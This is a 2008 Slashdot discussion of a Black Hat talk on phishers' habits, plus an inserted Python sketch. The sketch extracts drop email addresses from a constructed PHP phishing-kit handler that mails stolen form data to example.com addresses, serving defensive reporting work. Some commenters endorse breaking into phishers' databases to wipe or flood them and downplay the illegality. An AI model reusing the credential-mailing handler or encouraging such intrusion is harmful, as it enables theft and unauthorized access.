
How Phishers Think, Act, and Make a Profit

whitehartstag writes with a write-up of "the excellent session at Black Hat that detailed 'how phishers create sites, share info and code, and basically are lazy.' They store their stolen data 'on websites that they have hacked into, or on [publicly available] sites like guestbooks. And even worse, they are not protecting their stolen data ... which means that all one needs to do to find this info is to reverse engineer a real phisher's website, look at their PHP script, and find out where they are storing the data.'"
  • I wish the article had good suggestions for how to prevent phishing attacks. Instead, it seems like this article is suggesting I can easily steal already stolen credit-card data.

  • by davester666 ( 731373 ) on Thursday August 07, 2008 @10:00PM (#24520027) Journal

    Offhand, the only 'good' thing you could do would be to hoop the database. If it's poorly secured, you could get it to delete all the current records. If it's more secure, you could fill it with slightly bogus data [like real names and addresses, but phony credit card numbers].

    This could result in:
    -fills up the drive on the computer it's stored on, which would at least temporarily halt more stupid people from adding their data to it
    -make it difficult to filter out good entries from bad. The data is kind of correct, they might have to actually pass it to the credit card company to actually check if it's good or not
    -if they can't filter out the bad entries, it makes using the database to do 'bulk' transactions easier for the credit card companies to notice [assuming they put much effort into it instead of just passing the cost onto merchants] as it happens, instead of 30 days later when people complain.

  • One time... (Score:1, Interesting)

    by JimboFBX ( 1097277 ) on Thursday August 07, 2008 @10:31PM (#24520227)
    One time I received an e-mail saying my account at a local credit union had been compromised (he was using the university's public ability to look up people to attack their e-mail address). The thing was I didn't have an account at that credit union. I knew it was a phishing scheme, so I clicked the link and intentionally made up a user name and said my password was "the FBI is coming". Of course, it went to the next page to re-affirm my personal information.

    I e-mailed the real credit union, told them about it, told them the link, and even who-is'd him for them in the e-mail (it appeared to be an Indian name). They told me they were looking into it. 4 months later I got the same e-mail, same website. A third e-mail showed up next year as well.

    The funny thing is that in the local college newspaper there was a guy who said he'd charge $35 to install Windows Vista on people's computers if they were a college student. Windows Vista was offered for free to individuals of the university, you just had to go download the installer. I called the number on the ad, being pissed off at how he was trying to rip people off, to give him a fake place to show up at. It went to his voice mail.

    He had a thick Indian accent. Same guy? Coincidence? No idea. I ended up not leaving a message.

    I still have the e-mail message. The domain he used is no longer registered to anyone. I hope they nabbed him.
  • by Anonymous Coward on Thursday August 07, 2008 @10:50PM (#24520357)

    A lot of phish sites using php are sending the captured info to email accounts (gmail and yahoo seem to be the most popular).

    While there are times when you can find credit card or login info in txt files stored on a hacked server, I see them using email as a dumping ground more often, and keeping an actual database on the same server as the site is hosted seems far too dumb to be very common.

    As a side note, I try to report these email accounts when I find them and while I can't say what gmail has done with the reports I've sent them, I can say that yahoo has been completely impossible to work with. The last time I tried, I even got a response back but they misunderstood (obviously didn't bother to fully read) my email. Even after going back and forth with them two other times, and trying everything I could to explain it clearly they didn't get it.

    They kept thinking I was trying to report spam I had seen sent to me from a yahoo account and they wanted headers.
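
The reporting workflow this comment describes starts with pulling the drop addresses out of a recovered kit. The sketch below is an added example, not code from the thread or the Black Hat talk; the PHP sample and every address in it are constructed, and it assumes a kit that passes the recipient to `mail()` as a literal or a simply assigned variable, optionally wrapped in `base64_decode`.

```python
import base64
import re

# Constructed sample of a phishing-kit form handler (not taken from any real kit).
SAMPLE_KIT = r'''<?php
$send = "dropbox.one@example.com";
$bcc  = base64_decode("ZHJvcC50d29AZXhhbXBsZS5vcmc=");
$msg  = "User: " . $_POST['user'] . "\n";
mail($send, "New result", $msg, "From: results@example.net");
mail($bcc, "New result", $msg);
mail("drop.three@example.com", "copy", $msg);
?>'''

EMAIL = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')
ASSIGN = re.compile(r'\$(\w+)\s*=\s*(base64_decode\(\s*)?["\']([^"\']+)["\']')
MAIL_CALL = re.compile(r'\bmail\s*\(\s*(\$\w+|["\'][^"\']*["\'])')

def resolve_assignments(source):
    """Map PHP variable names to literal strings, decoding base64_decode("...")."""
    values = {}
    for name, encoded, literal in ASSIGN.findall(source):
        if encoded:
            try:
                literal = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
            except ValueError:  # not valid base64: leave the variable unresolved
                continue
        values[name] = literal
    return values

def drop_addresses(source):
    """Return addresses used as the first (recipient) argument of mail(), in order."""
    values = resolve_assignments(source)
    found = []
    for arg in MAIL_CALL.findall(source):
        text = values.get(arg[1:], "") if arg.startswith("$") else arg.strip("\"'")
        for addr in EMAIL.findall(text):
            if addr.lower() not in found:
                found.append(addr.lower())
    return found

if __name__ == "__main__":
    for addr in drop_addresses(SAMPLE_KIT):
        print(addr)
```

Only the recipient argument is inspected, so the spoofed `From:` header in the sample is not reported as a drop address.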

  • by maxume ( 22995 ) on Thursday August 07, 2008 @11:00PM (#24520403)

    So the only thing keeping poor Billy from stealing data is that he hasn't thought about it and a timely article on /. is going to push him over the edge?

    Probably not.

  • I have to know (Score:3, Interesting)

    by zappepcs ( 820751 ) on Thursday August 07, 2008 @11:07PM (#24520437) Journal

    The title and summary suggest that phishers are somehow less. Lazy? What, are drug dealers not lazy? Pimps more business savvy?

    That is just bothering me. Anyone else think that is just wrong? Lazy? WTF exactly would a non-lazy phisher do? Set up a data center in the Caymans? Seriously!

  • Re:One time... (Score:3, Interesting)

    by c0nsole ( 1164167 ) on Thursday August 07, 2008 @11:10PM (#24520459)
    Sounds like a coincidence to me. I charge way more than that to install any OS on any computer, as the job usually involves backup and migration of the client's files, tracking down drivers, and other mundane stuff. For $35 it sounds like the guy was just trying to pick up some cash on the side. Even in the technical fields at my university I know there were *many* people who would never attempt something as trivial as installing an OS. Downloading and installing a printer driver is voodoo to those people, even though they themselves installed the printer via the 'quick setup poster' that came with it when it was new. Trying to show these sorts of people how to do this stuff themselves is an exercise in futility. I doubt the phisher in question would have the know-how to even be able to install Vista anyways...I heard they're quite lazy. :)
  • by CDMA_Demo ( 841347 ) on Thursday August 07, 2008 @11:28PM (#24520561) Homepage

    Engage brain before clicking.

    I think you proved subtly that we have a Darwinian mechanism at work through phishers and crackers.

  • by Opportunist ( 166417 ) on Friday August 08, 2008 @12:20AM (#24520899)

    With the advent of MPack and other tools from the RBN, it doesn't take a "hacker" anymore to phish. You buy a toolkit, you buy the exploit, you buy a trojan and the scripts for your server, and off you go. The reason why it's successful is simply that there are people who know less than the attacker about security.

    Detach yourself from the idea that phishers are in any way required to be security gurus, or that they're in some way intimate with the inner workings of PCs or networks. Those that know how to code don't attack anymore. They sell their attacking toolkits to others who then conduct the attacks.

  • by DaveWick79 ( 939388 ) on Friday August 08, 2008 @12:39AM (#24521007)
    No, it most certainly affects everybody, because if the phisher is good enough he is going to dupe many merchants out of thousands of dollars, and when the credit card companies issue chargebacks, it will put small businesses out of business, take those thousands of dollars out of the hands of the middle class and put them in the hands of some worthless hacker who is probably going to blow it on dope. It has a far reaching effect.
  • AC? (Score:2, Interesting)

    by funkdancer ( 582069 ) <funkyNO@SPAMfunkdancer.com> on Friday August 08, 2008 @01:41AM (#24521295)

    How long until some jokester does a phishing attack that submits the info to random slashdot threads?

  • by jschottm ( 317343 ) on Friday August 08, 2008 @02:25AM (#24521491)

    I wish the article had good suggestions for how to prevent phishing attacks.

    But it does. Given that the miscreants are apparently posting information into public forums, simply enter your credit card number into a google search from time to time and see if it turns up. (Note for those without a sense of humor: don't do that.)

    Seriously, what did you expect from a two paragraph writeup (one of which isn't actually about phishing but sale of CCs) of a talk at a conference that says with a wink and a nudge that they cater to the bad guys? There's not actually enough information in the blog (not that there's supposed to be) to warrant getting on slashdot. There's a bunch of resources [google.com] available discussing the subject if you really need information on the subject.

  • by Eskarel ( 565631 ) on Friday August 08, 2008 @02:56AM (#24521625)
    I really don't think legality is all that much of an issue. You're looking at more risk of them sending hired goons than the police.

    Remember illegal access to a computer is illegal, but anyone running a database full of stolen credit card numbers is probably not going to call the cops on you, especially since to prove you accessed the system they'd have to keep it pretty much intact.
